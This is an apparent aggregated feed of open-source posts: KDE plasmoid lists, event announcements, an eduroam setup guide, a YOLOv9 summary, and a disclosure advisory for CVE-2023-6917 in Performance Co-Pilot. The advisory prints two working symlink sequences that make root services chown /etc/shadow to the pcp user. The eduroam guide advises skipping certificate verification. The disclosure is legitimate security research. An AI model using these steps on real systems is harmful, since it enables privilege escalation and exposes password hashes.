25 plasmoides para el escritorio Plasma de KDE, del 101 al 125
Uno de los temas recurrentes del blog son los plasmoides. Hace ya mucho tiempo que publiqué los artículos recopilatorios del 1 al 25, 26 al 50 , del 51 al 75 y del 76 al 100 pero sigo teniendo pendiente hacer los siguientes. Ahora que estamos a punto de llegar a los 250 es el momento de seguir con 25 plasmoides más para el escritorio Plasma, en esta ocasión del 76 al 100.
¿Qué son los plasmoides?
Para los no iniciados en el blog, quizás la palabra plasmoide le suene un poco rara pero no es mas que el nombre que reciben los widgets para el escritorio Plasma de KDE.
En otras palabras, los plasmoides no son más que pequeñas aplicaciones que puestas sobre el escritorio aumentan las funcionalidades del mismo, nos dan información útil o simplemente lo decoran.
25 plasmoides para el escritorio Plasma de KDE, del 101 al 125

La siguiente lista puede tener algún que otro plasmoide desactualizado pero es un buen repaso a estas miniaplicaciones que llenan de funcionalidad al escritorio más completo que puedes encontrar en el mercado… y uno de los que tienen mejor precio: 0 €.
- Simple Weather: un plasmoide meteorológico.
- Latter Space: añade un espacio en blanco de dimensiones personalizable en cualquier barra de tareas del escritorio Plasma.
- Daily Forecast: otro plasmoide meteorológico.
- Public IP Address: controlada nuestra dirección de internet pública.
- Latte Slideshow: informa al panel de Latte del color predominante y ésta adapta su color.
- Latte Window Colors: cambia automáticamente la barra de Latte Dock según el color que tengamos elegido en nuestro sistema.
- EQMen: lanzador de aplicaciones para EQuilibrium
- Media Controller Compact: plasmoide que nos permite controlar nuestro reproductor multimedia desde la barra de tareas.
- Bumblebee-indicator: muestra el estado de la tecnología Bumblebee de las tarjetas Nvidia en nuestro sistema KDE.
- Device: accede a tus pendrive desde el escritorio cuando se monten.
- Termoid: muestra una terminal que puedes poner en tu escritorio.
- KickEQ: otro lanzador de aplicaciones para EQuilibrium.
- Plasma Customization Saver: guardando tu configuración Plasma.
- Customizable multi-action menu: un plasmoide que nos ayuda a personalizar el menú contextual de Dolphin.
- Latte Analog Clock: el clásico reloj analógicoadaptado a las peculiaridades de Latte Dock.
- Chili Clock: un plasmoide que nos permite tener otro reloj digital en nuestro entorno Plasma.
- Digital Clock WL: alternativa al clásico reloj digital que incorpora otra forma de visualización del calendario.
- Ditto Menu: otro lanzador de aplicaciones
- Vertical Digital Clock EQ: otro reloj digital que tiene una característica única, mostrar la hora en disposición vertical.
- Fokus: tu pomodoro para KDE.
- Virtual Desktop Bar: un plasmoide creado por Wsdfhjxc que nos permite pasar de un escritorio virtual a otro.
- Mediacontroller Plus, vitamina el control multimedia de Plasma.
- Crypto Currency Price Plasmoid: también hay plasmoides para controlar las criptomonedas.
- USwitch: un plasmoide que nos permite adaptar la «ventana» de salida del sistema a nuestros gustos o necesidades.
- Kickoff/Grid: lanzador estilo tabla para Plasma
- Split Digital Clock: otro reloj digital con disposición Vertical.
Y con esto llegamos a los 125… todavía me quedan más de 150 por recopilar. Ya se hará,
La entrada 25 plasmoides para el escritorio Plasma de KDE, del 101 al 125 se publicó primero en KDE Blog.
HU Berlin eduroam for Android
I tried to setup eduroam for the Humboldt University of Berlin (Humboldt Universität in Berlin) using the app advertised in the manual: geteduroam
Unfortunately, the app crashes on my Android phone. If this is your case as well, proceed as follows:
- download the CA certificate hu-ca-2024.crt1
- go to your wifi settings and select
eduroamto setup this wifi - use TTLS/PAP (I forgot which one)
- add anonymous identity:
eduroam@hu-berlin.de - add username as username@hu-berlin.de (use username@physik.hu-berlin.de or username@mathematik.hu-berlin.de if your account is with those faculties)
- add as CA certificate the file downloaded before
- do not verify this certificate
- add as domain:
hu-berlin.de
Note that other universities may require other setups.
-
I have created this certificate file with
openssl x509 -inform PEM -outform DER -in CA.pem -out hu-ca-2024.crtusing theCA.pemextracted from the eduroam setup for my PC. ↩︎
Disable Input Devices in Wayland
Performance Co-Pilot (pcp): Unsafe use of Directories in /var/lib/pcp and /var/log/pcp breaks pcp Service User Isolation (CVE-2023-6917)
1) Introduction
Performance Co-Pilot (pcp) is a performance analysis toolkit that allows to gather and evaluate data on a local system and also share this data over the network in a distributed manner.
During routine reviews we noticed issues in pcp on Linux with directory permissions that allow to locally escalate privileges from the pcp service user to root.
These findings are based on the 5.3.7 version release of pcp. CVE-2023-6917 has been assigned for this class of issues in pcp.
2) Service User And Directory Permissions
The systemd services shipped with pcp run with mixed privileges. Some use only
limited pcp user/group privileges, like “pmie_check.service”. Others like
“pmcd.service” run with full root privileges. The pmcd daemon implements the
networking logic of pcp. It drops privileges from root to pcp during
startup.
The different pcp programs use a shared directory structure:
- /var/lib/pcp/tmp owned by
pcp:pcpmode0775 - /var/log/pcp owned by
pcp:pcpmode0775
When privileged processes running as root access files in directories or directory trees controlled by unprivileged users, then easily security issues can result from this. For the directories listed above, we quickly found the two exploitable issues that are described in the following sections.
3a) Startup Script for pmcd runs chown for $PCP_TMP_DIR/pmlogger
The “pmcd.service” runs with root privileges and executes the bash script
“/usr/libexec/pcp/lib/pmcd” (named “rc_pmcd” in the Git source repository).
Within this script the following code runs as part of the
start routine, found in function _reboot_setup():
if [ ! -d "$PCP_TMP_DIR/pmlogger" ]
then
mkdir -p -m 775 "$PCP_TMP_DIR/pmlogger"
chown $PCP_USER:$PCP_GROUP "$PCP_TMP_DIR/pmlogger"
if which restorecon >/dev/null 2>&1
then
restorecon -r "$PCP_TMP_DIR"
fi
else
$PCP_TMP_DIR in this context refers to “/var/lib/pcp/tmp”, owned by pcp:pcp
mode 0775. Since the shell code above does not exit on errors, a compromised pcp
user doesn’t even have to win a race condition to perform a symlink attack.
The following exploit works:
# simulate a compromised pcp user
root # sudo -u pcp -g pcp bash
pcp $ cd /var/lib/pcp/tmp
pcp $ rm -r pmlogger
pcp $ ln -s /etc/shadow pmlogger
pcp $ exit
root # systemctl start pcmd.service
root # ls -l /etc/shadow
-rw-r----- 1 pcp pcp 1.2K Dec 7 15:47 /etc/shadow
3b) Startup Script for pmproxy runs chown in $RUN_DIR
The “pmproxy.service” runs with root privileges and executes the bash script
“/usr/libexec/pcp/lib/pmproxy” (named rc_pmproxy in the Git source
repository). Within this script the following code runs as
part of the start (and other) routines:
# create directory which will serve as cwd
if [ ! -d "$RUNDIR" ]
then
mkdir -p -m 775 "$RUNDIR"
chown $PCP_USER:$PCP_GROUP "$RUNDIR"
fi
$RUN_DIR in this context refers to “/var/log/pcp/pmproxy”. “/var/log/pcp” is
owned by pcp:pcp mode 0775. Similar to the exploit described in section
3a), no race condition has to be won to exploit this:
# simulate a compromised pcp user
root # sudo -u pcp -g pcp bash
pcp $ cd /var/log/pcp
pcp $ rm -rf pmproxy
pcp $ ln -s /etc/shadow pmproxy
pcp $ exit
root # systemctl start pmproxy.service
root # ls -l /etc/shadow
-rw-r----- 1 pcp pcp 1.2K Dec 7 15:47 /etc/shadow
4) Summary
We only picked two of the more obvious security issues that result from root processes operating on these pcp owned directories. There are likely more issues of the same class lingering in the pcp scripts that run as root. Given this, the user separation of pcp can be considered nonexistent in its current form, and the pcp user should be treated equal to root.
The pcp service user is also used for the network facing pmcd component,
thus these issues strongly impact defense in depth for pcp, for the scenario
when an attacker finds a way to exploit the network daemon.
5) Bugfix
Upstream performed a wider redesign of the privilege separation handling in pcp components. The pull request corresponding to this contains a large number of commits. It is difficult to isolate any simple patches from that.
In our Bugzilla bug that tracks this issue, I attempted to identify the subset of commits relevant to this issue, to help with backporting.
6) Timeline
| 2023-12-13 | I reported the findings to pcp-maintainers@groups.io offering coordinated disclosure. |
| 2023-12-14 | The Red Hat Security Team was added to the discussion. |
| 2023-12-15 | After some initial disagreement whether this qualifies as an actual security issue, an agreement was found that it is a change of security scope and deserves a CVE assignment. |
| 2023-12-15 | An upstream author suggested mid of February as a publication date, for which time a release for pcp had been planned anyway. |
| 2023-12-18 | Red Hat Security assigned CVE-2023-6917 to track the issue(s). |
| 2024-01-01 | Upstream discussed some initial changes to address the issue(s) in the mail thread and I tried to give some feedback about them. |
| 2024-02-20 | Communication about the publication process died down, and I learned from our packager that the Pull Request containing the fixes had already been public for some time. It seems no clear embargo had been established for the coordinated release, there had been contradicting statements. |
| 2024-02-27 | After verifying with the upstream authors that publication is okay I finalized my report and published all information. |
7) References
Mesa redonda y tertulia Linuxera – Charla Hablemos de marzo de GNU/Linux València
Organizada por la asociación sin ánimo de lucro GNU/Linux València retomamos las charlas Hablemos para finales de marzo. Y lo hace con una Mesa redonda y tertulia Linuxera que se celebrará el próximo el próximo 22 de marzo a las 19:00 horas.
Mesa redonda y tertulia Linuxera – Charla Hablemos de marzo de GNU/Linux València
Me complace presentaros un nuevo evento de la Asociación sin Ánimo de Lucro GNU/Linux València que retoman sus actividades con una vuelta a las orígenes, las mesas redondas y la tertulias con temas abiertos, al estilo primer evento en el que participé con ellos en Akademy-es 2018.
De esta forma se espera a empezar a calentar motores dado que no hay que olvidar que el próximo 24 y 25 de mayo se celebrará esLibre y Akademy-es en València, y justamente en la misma sede (o al menos en una de ellas, Las Naves).
En palabras de los organizadores:
Comenzaremos la ronda de eventos con un Hablemos, en el que debatiremos sobre temas de actualidad Linuxera.
Es este caso será el 22 de marzo a las 19:00 a 20:30 GTM+2 (huso horario de la España peninsular) en Las Naves (Carrer de Joan Verdeguer, 16, 46024, València: Localización en OpenStreetMap).
Más información: GNU/Linux València

¡Únete a GNU/Linux València!
Aprovecho para recordar que desde hace unos meses, los chicos de GNU/Linux Valencia ya tienen su menú propio en el blog, con lo que seguir sus eventos en esta humilde bitácora será más fácil que nunca, y así podréis comprobar su alto nivel de actividades que realizan que destacan por su variedad.
Y que además, GNU/Linux València creció y se ha convertió en asociación. Así que si buscas una forma de colaborar con el Software Libre, esta asociación puede ser tu sitio. ¡Te esperamos!
La entrada Mesa redonda y tertulia Linuxera – Charla Hablemos de marzo de GNU/Linux València se publicó primero en KDE Blog.
Gridfinity Screwdriver Rack
Plasma 6 a la vuelta de la esquina
La comunidad de KDE publicará un megalanzamiento el próximo 28 de febrero de 2024

Encaramos la última semana de febrero de 2024. Eso significa que en un par de días, el próximo 28 de febrero, se publicará de manera oficial el gran megalanzamiento de la comunidad KDE.
Este gran megalanzamiento consiste en la publicación de su escritorio Plasma versión 6, KDE Gear y Frameworks.
Soy usuario de KDE desde que comencé en esto de GNU/Linux. En KDE encontré un escritorio flexible, potente, amigable, y grandes aplicaciones para mi día a día. Que hacían que el software libre fuese usable y amigable para un neófito como yo.
Hoy en día, después de tantos años, sigo manteniendo mi pasión por el software creado por la comunidad de KDE. Sigo encontrando que hacen un trabajo de calidad, comprometidos con unos valores a los que quiero apoyar.
Así que no quería dejar de anunciaron que el próximo día 28 de febrero de 2024, publicarán un gran lanzamiento que abarcará su escritorio Plasma, KDE Gears y Frameworks.
Plasma
En KDE Plasma es el entorno de escritorio, lo que «dibuja» en tu equipo las ventanas, las barras, los botones y cómo estas se comportan. Esta nueva versión 6 integra Qt6 sobre la que se integra Plasma.
KDE Gear
Corresponde al conjunto de aplicaciones propias de la comunidad KDE. Sin duda se convierten en imprescindibles aplicaciones como Dolphin, Kate o Kdenlive (por citar unas pocas).
Se integran con el sistema y tienes una aplicación para casi cualquier cosa que necesites. También en este megalanzamiento se actualizarán estas aplicaciones.
KDE Frameworks
Añade herramientas creadas por la comunidad de KDE encima de las que proporciona el conjunto de herramientas de Qt.
Esta gran actualización de la comunidad de KDE, no solo implica un gran trabajo y labor de desarrollo y depuración. Mi gratitud a todas esas personas. También implica un compromiso a seguir desarrollando software libre innovando y apostando por nuevos diseños y tecnologías más modernas.
Pronto llegará a las principales distribuciones rolling release, como por ejemplo openSUSE Tumbleweed o Arch y derivadas.
En openSUSE sé que se van probando las distintas versiones de desarrollo que se han ido publicando, por lo que como siempre, la gente que empaqueta el software de KDE para openSUSE pronto lo tendrá disponible y lo podré disfrutar en mi equipo.
Personalmente con esta nueva publicación, quiero aprovecharla para hacer limpieza en mi portátil. Tengo Tumbleweed desde hace muchos años, en los que se han acumulado programas o utilidades ya no utilizo, repositorios de pruebas, etc.
Cuando tenga tiempo, quiero guardar lo necesario, y formatear de nuevo el equipo para instalar una openSUSE Tumbleweed desde cero.

Community Plans for Summit in Berlin
The community is headed to Berlin on June 19 for a Community Summit in association with SUSE’s premier annual global technical conference SUSECON.
Registration for the event is open and the Call for Papers is open until May 29. Partners of SUSE, openSUSE, open source community projects and community members that want to participate are encouraged to register for the summit and submit a talk.
The schedule for the Community Summit will be released on May 30.
There is a Community track and an open source track. There are two types of talks that can be submitted for the summit. One is a short talk with a 15-minute limit and the other is a standard talk with a 30-minute limit.
Attendees of SUSECON are also welcome to attend and submit talks. The Community Summit is a free community event that will take place on the last day of SUSECON.
The summit will take place a week before the openSUSE Conference in Nuremberg, so attendees of SUSECON should consider staying for the openSUSE Project’s annual conference and submit a technical talk. For small- and medium-sized enterprises, there will be a 4-hour Open 4 Business networking event held on June 26 next to SUSE’s offices in Nuremberg.
Contact ddemaio (@) opensuse.org if you have any questions concerning the summit.
Fiesta de lanzamiento de Plasma 6 de Barcelona
Se acerca el maravilloso y esperado 28 de febrero donde se lanzará la mayor actualización de Software KDE en años y ya se están organizando las fiestas de lanzamiento de Plasma 6, unos pequeños eventos que sirven para reunir usuarios y desarrolladores para conocer las nuevas características y mejoras de la versión, al tiempo que sirven para socializar y compartir su pasión por el software libre. En esta ocasión me complace promocionar la fiesta de lanzamiento de Plasma 6 de Barcelona, donde se está organizando una cena.
Fiesta de lanzamiento de Plasma 6 de Barcelona
La ciudad condal siempre ha sido una de las más activas en cuanto a eventos relacionados con el Software Libre de España, y no solo relacionados con eventos KDE, por lo que te puedas encontrar una pequeña fiesta de lanzamiento con lo que celebrar que se ha dado otro salto tecnologógico para seguir llevando a lo más alto el Software Libre.
La información básica es la siguiente:
- Fecha: 2 de marzo
- Hora: 19:00 para las bebidas, 21:00 para la cena
- Lugar: Craft Beer ArteSants, calle Guadiana, 08014-Barcelona
- ¿Qué vamos a hacer? Copas y Cena
Si estás en Barcelona y no tienes plan, yo no lo dudaría. Tendrás la ocasión de encontrarte con desarrolladores de primer nivel de la Comunidad KDE y disfrutar de una tarde-noche que seguramente será más que agradable Y si tienes plan… llévatelo a la fiesta de KDE..
Enlace para apuntarse y más información: Promo/Events/Parties/KDE 6th Megarelease#Barcelona
Fiestas de lanzamiento de Plasma 6
Las fiestas de lanzamiento de Plasma 6, la última versión del entorno de escritorio de KDE, han generado gran expectativa entre la comunidad de usuarios y desarrolladores. Durante estos eventos o fiestas de lanzamiento, se realizan presentaciones y demostraciones de las nuevas funcionalidades de Plasma 6, lo que brinda a los asistentes la oportunidad de explorar de primera mano las innovaciones que ofrece esta actualización.
Tambien es común que se organicen actividades como hackatones, en las que los desarrolladores trabajan en conjunto en la resolución de problemas o en el desarrollo de nuevas ideas para futuras versiones del software.

En otros tiempos se realizaban cada lanzamiento semestral pero el ritmo de la Comunidad KDE es ta elevado que al final se han reservado para ocasiones especiales como es este del próximo 28 de febrero.
Para organizarse un poco, el equipo de Promo de la Comunidad KDE ha dispuesto una página para poder centralizar estos eventos. En sus palabras:
Esta página es para los listados de la fiesta de lanzamiento del 6º Megarelease de KDE. Por favor, siga la siguiente plantilla para facilitar la lectura y mantenerlo ordenado.
El 6º Megarelease de KDE está planeado para el 28 de febrero de 2024, por supuesto no hay necesidad de celebrarlo el mismo día.
Usamos el término «fiesta» pero puede ser lo que quieras, una cena, una reunión en una cafetería, una charla en tu grupo local de Software Libre, ¡sé creativo!
Si tienes preguntas, envía un correo electrónico a aacid@kde.org o kde-promo@kde.org.
En un principio se están organizando varias en Europa y una en el América del Norte, pero seguro que se irán añadiendo más y más cuando se acerque el evento.
Para España, de momento, tenemos dos ciudades donde se están moviendo las cosas, Barcelona y Málaga, y me consta que hay otra que lo está intentando.
Por otro lado, no seas pasivo y anímate a organizarla en tu ciudad si no está en la lista. Son eventos que dejan un gran sabor de boca.
Más información: Promo/Events/Parties/KDE 6th Megarelease
La entrada Fiesta de lanzamiento de Plasma 6 de Barcelona se publicó primero en KDE Blog.
YOLO v9 Chegou!

O YOLOv9 surgiu dia 21 de fevereiro de 2024 pelos pesquisadores Chien-Yao Wang, I-Hau Yeh e Hong-Yuan Mark Liao, no artigo “YOLOv9: Learning What You Want to Learn Using Programmable Gradient Information”, este modelo demonstrou uma precisão superior em comparação aos modelos YOLO antecessores.
O YOLOv9 representa um avanço significativo na detecção de objetos, superando o desempenho do YOLOv8 com inovações como o Programmable Gradient Information (PGI) e a arquitetura Generalized Efficient Layer Aggregation Network (GELAN). O PGI permite a preservação completa da informação de entrada, essencial para a atualização eficaz dos pesos da rede, enquanto a GELAN melhora a eficiência dos parâmetros. Testado no dataset MS COCO, o YOLOv9 mostrou-se mais eficiente e preciso que seus predecessores, utilizando menos parâmetros e cálculos. O código-fonte e as instruções foram disponibilizados pelos autores, embora algumas versões dos pesos e licenças estejam pendentes.

Fonte:
Melo Júnior, José Carlos de. “YOLOv9: Aprenda a Detectar Objetos”. Blog do Sigmoidal, 24 fev. 2024. Disponível em: https://sigmoidal.ai/yolov9-aprenda-a-detectar-objetos